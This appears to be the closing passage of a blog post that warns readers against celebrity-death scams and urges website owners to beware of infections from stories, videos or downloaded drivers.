The moral of this story is, don’t believe everything you hear or read. Don’t be a victim of a scam that some cybercriminal has concocted. If some famous person has passed away, watch TV. Go to CNN.com and search for it there. Don’t fall into the bottomless pit of despair by allowing yourself to be lured into one of these scenarios.

Remember, that as a website owner, your site could become infected by something you did online, a story you read, or a video driver you downloaded. That could be more damaging than not being totally up-to-date on whether or not someone famous died.

That’s just my opinion, what’s yours?